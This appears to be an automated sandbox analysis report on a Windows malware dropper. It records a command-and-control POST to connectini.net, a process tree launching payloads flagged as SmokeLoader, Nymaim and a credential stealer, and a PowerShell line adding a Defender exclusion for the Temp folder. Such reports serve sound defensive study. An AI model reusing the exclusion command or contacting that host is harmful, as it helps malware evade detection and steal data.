                                                                                                                          2022-05-21 07:32:40 UTC1533INData Raw: ba 03 20 d6 75 b3 01 ca c7 00 14 0d 66 73 71 1a 7e 3d 24 06 81 06 ec fc a1 0b 7d 12 3a 15 7a 56 68 25 23 9c 3b ef 4d a5 f8 e1 0d 32 00 62 cf 0e f8 8a 44 c1 75 ce e5 17 76 9d 74 c2 d8 f9 43 17 f6 04 1c dd 21 80 c2 41 ce 92 db fe 8d f8 81 25 00 74 ec fa 79 00 5b 9e 76 56 19 7c b0 c2 80 9d 3f 74 61 4f 40 bb e6 4d 30 a5 0f 00 ec fa 02 3f a4 04 80 c4 5c 33 1d a0 78 44 73 43 93 02 35 45 00 38 52 d8 13 70 84 b3 ff ea 34 d9 e8 78 b4 0f 1a 00 5a 9f 15 f0 66 a5 ac b3 f1 eb 8b 00 70 b8 b0 27 e0 90 73 fe 06 50 3d 99 5d db 97 e1 87 92 00 20 c8 0b d9 e5 c1 e3 4e cb 33 76 bd 11 00 1c 61 4f 00 64 9e 05 50 39 3e 78 c1 0f 24 00 9a dd 90 ea 80 40 81 86 23 ec fc a1 0b 6d f0 a3 a7 02 94 8f f6 d7 9a 3d 01 c0 5b d7 cf 71 ee 11 84 bb 11 00 b0 84 32 f0 05 fd 01 76 ad c1 0f 9f 0a
                                                                                                                          Data Ascii: ufsq~=$}:zVh%#;M2bDuvtC!A%ty[vV|?taO@M0?\3xDsC5E8Rp4xZfp'sP=] N3vaOdP9>x$@#m=[q2v


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          9192.168.2.44980937.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:42 UTC1544OUTPOST /Series/Conumer2kenpachi.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Host: connectini.net
                                                                                                                          Content-Length: 53
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:32:42 UTC1545INHTTP/1.1 100 Continue
                                                                                                                          2022-05-21 07:32:42 UTC1545OUTData Raw: 63
                                                                                                                          Data Ascii: c
                                                                                                                          2022-05-21 07:32:42 UTC1545OUTData Raw: 68 61 72 69 7a 61 72 3d 4d 54 6b 65 4d 36 4b 70 76 61 30 6b 6c 70 5a 30 61 63 6a 77 64 37 4f 62 74 6c 34 31 39 67 38 5a 56 4a 75 6d 4d 30 30 49 4e 53 30 3d
                                                                                                                          Data Ascii: harizar=MTkeM6Kpva0klpZ0acjwd7Obtl419g8ZVJumM00INS0=
                                                                                                                          2022-05-21 07:32:42 UTC1545INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:42 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          360
                                                                                                                          cv/g6g6pYaOuCPQQIXErWnJfaRcpz68Hg8SZMDO8/snWVGFybJwd60eD617n6vzQ12b8C2cErB5Rbt9CD9M/kNUJJdlHGJYccHMJCwNcxm7ohok29D2MV8lS/NlVo8qVB94uZaaijhKMYs7/wLsnCxmjJa4aUqV14CxztxXbzBDiAAfNZvnKuoEDyiDRSs6As04cluXoZvMqyQSdDir4qV1+x5+CzUsjDz0H85XjzTIo40mpFaq3WKaJILGRJPAh6UgLbB9ZapqEUoDAwibfSPcWS9ZoYDdfRcq45sgn7m9Ep4Pp6QUrx/JqE9ytgqkizKip4QV7lWJbxEakz0RENyZyZAvnXRQ95QghsPt4gQcP8EZ5LjWlvoS4FxFDlRwRWOuuFVyq0Z6lqZnFWPuFqDgGEl+Bhsii8+SqPHcChQx891gjyZ82kxQaLs6Un+9Me7EumqIFrwBoZILJtoJs8nEvFhLQjYEc7800XN81UVynyaHAcq5ThV4Re0eV2+fj1ZO2F8E5BgtzM3RPs/4mRb+giq//R1IXbEGuiJ9dvlEJcUjLIXaoXjZT+EV8PAx/OjKy3nX1uk4oEjGObkageTN709+MXp8HndjNN++2TQv7JgcB0tIIzRIZBJCaBjFYICHIYZ5nXIs7sIxY6Q4IVMmhjV/AtSUPqn+dPtTf/bG9glqp9amWsMZEJgnbCztWA1sZFcwcZyJ3Emh9kpzQJQeSp4S5ki6pMP9L1tVcctS1Ae+9vBkJ/MaiKmHFchx5KYath8dLoYI7bkjae0C3BliNlPZMUzLu2Xs0CWrm3gIrwIDTqVsz9/ugewk0+UOJat2+qzB/qMKm76LQBEAnaQ==
                                                                                                                          0


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:09:30:06
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\T4IoJqcAwY.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:9083840 bytes
                                                                                                                          MD5 hash:A9AEA2720AA1E020BF30E7F17463BF2D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:09:30:23
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2223997 bytes
                                                                                                                          MD5 hash:9B3B6EB4710B6B689E6D3C8AC68347FB
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:09:30:24
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff647620000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:09:30:24
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:09:30:25
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 6282924fea1c3_82ebfc59.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:09:30:25
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                                                                                                                          Imagebase:0x800000
                                                                                                                          File size:430592 bytes
                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:09:30:25
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 628292505a6c3_91a0215e.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:09:30:25
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:6282924fea1c3_82ebfc59.exe
                                                                                                                          Imagebase:0x1f0000
                                                                                                                          File size:331264 bytes
                                                                                                                          MD5 hash:C700E917DD024B491793800D89E88F92
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 43%, Metadefender, Browse
                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:09:30:26
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 62829251169ea_9dc91d.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:09:30:26
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 62829252dc457_91e450cbce.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:14
                                                                                                                          Start time:09:30:26
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:62829251169ea_9dc91d.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:315392 bytes
                                                                                                                          MD5 hash:171F2967683A3DF041312E473FA664E5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 49%, Metadefender, Browse
                                                                                                                          • Detection: 84%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:09:30:27
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 62829254ab49d_fc210c4a.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:09:30:27
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:62829252dc457_91e450cbce.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1854409 bytes
                                                                                                                          MD5 hash:ABA047B6FD3151E4EC49575B507552F4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 17%, Metadefender, Browse
                                                                                                                          • Detection: 31%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:09:30:27
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 6282925776f05_4ee107b.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:09:30:28
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:62829254ab49d_fc210c4a.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:304640 bytes
                                                                                                                          MD5 hash:20F7806A7719B1F94B8B4756F786CE36
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.555317118.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.555585024.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000003.315223819.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:09:30:28
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 62829258f111c_8df26f0c7d.exe /mixtwo
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:09:30:28
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:6282925776f05_4ee107b.exe
                                                                                                                          Imagebase:0xff0000
                                                                                                                          File size:2120699 bytes
                                                                                                                          MD5 hash:0F0FA21EC39133BFA480B0CF3DFCED00
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:09:30:29
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 6282925ab52f1_fdd12e5.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:09:30:29
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:62829258f111c_8df26f0c7d.exe /mixtwo
                                                                                                                          Imagebase:0x7ff7338d0000
                                                                                                                          File size:424448 bytes
                                                                                                                          MD5 hash:5E90B6DD2E1A6B5154E89AB7A9274E4F
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.329990024.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.333254439.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.332457104.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.373439148.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000003.319416057.0000000004810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.367298393.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.336022265.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.369246590.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000016.00000000.371676239.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:09:30:30
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 6282925b8abce_97dd7946.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:09:30:30
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:6282925ab52f1_fdd12e5.exe
                                                                                                                          Imagebase:0x140000000
                                                                                                                          File size:3684352 bytes
                                                                                                                          MD5 hash:0D8ED2ABED9402D2B69501CFC536FB2C
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:09:30:30
                                                                                                                          Start date:21/05/2022
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 6282925c504be_44b654a9fe.exe
                                                                                                                          Imagebase:0x1190000
                                                                                                                          File size:232960 bytes
                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:15.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0.9%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:20
                                                                                                                            execution_graph 11371 40c960 11372 40c97e 11371->11372 11373 40c96d 11371->11373 11373->11372 11377 40c9a6 11373->11377 11378 40c9b0 __EH_prolog 11377->11378 11386 40cf16 11378->11386 11385 403204 free 11385->11372 11388 40cf20 __EH_prolog 11386->11388 11387 40cf50 11423 403204 free 11387->11423 11388->11387 11407 40cf67 11388->11407 11424 403204 free 11388->11424 11390 40c9c6 11393 40cec5 11390->11393 11394 40cecf __EH_prolog 11393->11394 11398 40ceff 11394->11398 11478 408ac1 11394->11478 11483 403204 free 11394->11483 11396 40c9d2 11400 40c9f3 11396->11400 11484 403204 free 11398->11484 11485 403204 free 11400->11485 11402 40c9fe 11486 403204 free 11402->11486 11404 40ca06 11487 40c85f 11404->11487 11408 40cf71 __EH_prolog 11407->11408 11425 407c33 11408->11425 11416 40cfaa 11446 403204 free 11416->11446 11418 40cfb2 11447 40cfe0 11418->11447 11423->11390 11424->11388 11426 407c43 11425->11426 11427 407c48 11425->11427 11463 418ac0 SetEvent 11426->11463 11429 407c5e 11427->11429 11467 418a70 WaitForSingleObject 11427->11467 11433 40d079 11429->11433 11431 407c57 11468 418a40 11431->11468 11438 40d083 __EH_prolog 11433->11438 11434 40d0b8 11472 403204 free 11434->11472 11436 40cf96 11439 40ce6f 11436->11439 11438->11434 11473 403204 free 11438->11473 11444 40ce79 __EH_prolog 11439->11444 11441 40ceb6 11445 403204 free 11441->11445 11442 40ceae 11474 403204 free 11442->11474 11444->11442 11475 403204 free 11444->11475 11445->11416 11446->11418 11448 40cfea __EH_prolog 11447->11448 11449 407c33 5 API calls 11448->11449 11450 40d003 11449->11450 11451 418a40 ctype 2 API calls 11450->11451 11452 40d00b 11451->11452 11453 418a40 ctype 2 API calls 11452->11453 11454 40d013 11453->11454 11455 418a40 ctype 2 API calls 11454->11455 11456 40cfbf 11455->11456 11457 40d028 11456->11457 11458 40d032 __EH_prolog 11457->11458 11476 403204 free 11458->11476 11460 40d045 11477 403204 free 11460->11477 11462 40cfd3 11462->11388 11464 418ad0 GetLastError 11463->11464 11465 418acd 11463->11465 11466 418ada 11464->11466 11465->11427 11466->11427 11467->11431 11469 418a49 FindCloseChangeNotification 11468->11469 11471 418a5e 11468->11471 11470 418a54 GetLastError 11469->11470 11469->11471 11470->11471 11471->11429 11472->11436 11473->11438 11474->11441 11475->11444 11476->11460 11477->11462 11479 418a40 ctype 2 API calls 11478->11479 11480 408acc 11479->11480 11481 418a40 ctype 2 API calls 11480->11481 11482 408ad4 11481->11482 11483->11394 11484->11396 11485->11402 11486->11404 11498 403204 free 11487->11498 11489 40c86a 11499 403204 free 11489->11499 11491 40c872 11500 403204 free 11491->11500 11493 40c87a 11501 403204 free 11493->11501 11495 40c882 11502 403204 free 11495->11502 11497 40c889 11497->11385 11498->11489 11499->11491 11500->11493 11501->11495 11502->11497 11503 413840 11504 41384d 11503->11504 11506 41384a 11503->11506 11505 413851 malloc 11504->11505 11504->11506 11505->11506 11507 411340 11508 411354 11507->11508 11514 411646 11507->11514 11508->11514 11516 410f10 11508->11516 11510 411655 11512 407b5c 33 API calls 11510->11512 11510->11514 11512->11514 11513 41136d 11513->11510 11513->11514 11521 4075fa 11513->11521 11525 407b5c 11513->11525 11518 410f29 11516->11518 11519 410f71 11516->11519 11518->11519 11532 4137b0 11518->11532 11535 413790 11518->11535 11519->11513 11522 40761e 11521->11522 11523 40763d 11522->11523 11538 40bcc7 11522->11538 11523->11513 11526 407b69 11525->11526 11527 407b93 11526->11527 11571 4054a0 SetFileTime 11526->11571 11572 40d37e 11526->11572 11578 405298 11526->11578 11581 404462 SetFileAttributesW 11526->11581 11527->11513 11533 4137c2 11532->11533 11534 4137b4 VirtualFree 11532->11534 11533->11518 11534->11533 11536 413794 11535->11536 11537 413797 VirtualAlloc 11535->11537 11536->11518 11537->11518 11547 418d80 11538->11547 11540 40bcd1 EnterCriticalSection 11541 40bcf9 11540->11541 11542 40bd0e 11541->11542 11548 406827 11541->11548 11543 40bd61 LeaveCriticalSection 11542->11543 11554 406749 11542->11554 11543->11523 11547->11540 11549 406830 11548->11549 11550 406837 11548->11550 11549->11542 11559 405303 SetFilePointer 11550->11559 11552 40684f 11562 406803 11552->11562 11566 4053ee 11554->11566 11557 406776 GetLastError 11558 406772 11557->11558 11558->11543 11560 40532c GetLastError 11559->11560 11561 405336 11559->11561 11560->11561 11561->11552 11563 406807 11562->11563 11564 40680a GetLastError 11562->11564 11563->11549 11565 406814 11564->11565 11565->11549 11567 4053fb 11566->11567 11570 4053c1 ReadFile 11567->11570 11569 40540c 11569->11557 11569->11558 11570->11569 11571->11526 11573 40d38d 11572->11573 11575 40d467 11573->11575 11576 40d342 30 API calls 11573->11576 11582 4069de 11573->11582 11587 40d191 11573->11587 11575->11526 11576->11573 11579 4052a2 FindCloseChangeNotification 11578->11579 11580 4052ad 11578->11580 11579->11580 11580->11526 11581->11526 11592 405507 11582->11592 11585 406803 GetLastError 11586 406a11 11585->11586 11586->11573 11588 40d19b __EH_prolog 11587->11588 11599 405455 11588->11599 11602 401f26 11588->11602 11589 40d216 11589->11573 11594 405514 11592->11594 11595 405540 11594->11595 11596 4054cd 11594->11596 11595->11585 11597 4054db 11596->11597 11598 4054de WriteFile 11596->11598 11597->11598 11598->11594 11704 40525f 11599->11704 11603 401f30 __EH_prolog 11602->11603 11709 4023f0 EnterCriticalSection LeaveCriticalSection 11603->11709 11606 401f47 11622 401f4b 11606->11622 11710 40368d 11606->11710 11608 401f98 11613 405def VariantClear 11608->11613 11609 401fb0 11609->11608 11612 401fd4 11609->11612 11610 401fa2 11611 4037d2 3 API calls 11610->11611 11616 401fae 11611->11616 11820 40387d SysStringLen 11612->11820 11614 401fc4 11613->11614 11819 403204 free 11614->11819 11713 4037d2 11616->11713 11622->11589 11623 402022 11624 405def VariantClear 11623->11624 11625 402224 11624->11625 11869 403204 free 11625->11869 11626 401ff6 11626->11623 11628 402092 11626->11628 11629 4020b3 11626->11629 11693 402336 11626->11693 11630 405def VariantClear 11628->11630 11631 405def VariantClear 11629->11631 11632 40209a 11630->11632 11636 4020ce 11631->11636 11633 405def VariantClear 11632->11633 11634 4020a2 11633->11634 11826 403204 free 11634->11826 11636->11623 11724 4041f8 11636->11724 11639 40212f 11863 410da8 11639->11863 11643 402156 11645 40216b 11643->11645 11833 401e92 11643->11833 11742 403632 11645->11742 11649 402183 11651 4037d2 3 API calls 11649->11651 11650 4021aa 11653 40368d 2 API calls 11650->11653 11652 402191 11651->11652 11654 402198 11652->11654 11655 40219f 11652->11655 11657 4021bd 11653->11657 11843 404470 RemoveDirectoryW 11654->11843 11844 404419 CreateFileW 11655->11844 11745 404daf 11657->11745 11659 40219d 11861 403204 free 11659->11861 11664 402234 11685 4022e9 11664->11685 11870 4031dd malloc 11664->11870 11665 402206 11862 403204 free 11665->11862 11667 4037d2 3 API calls 11671 402307 11667->11671 11670 4021db 11670->11664 11672 4021df 11670->11672 11880 403204 free 11671->11880 11854 4038d0 11672->11854 11676 40230f 11881 403204 free 11676->11881 11680 402317 11882 403204 free 11680->11882 11684 40231f 11687 410da8 free 11684->11687 11685->11667 11686 40228b 11688 4038d0 3 API calls 11686->11688 11689 40232e 11687->11689 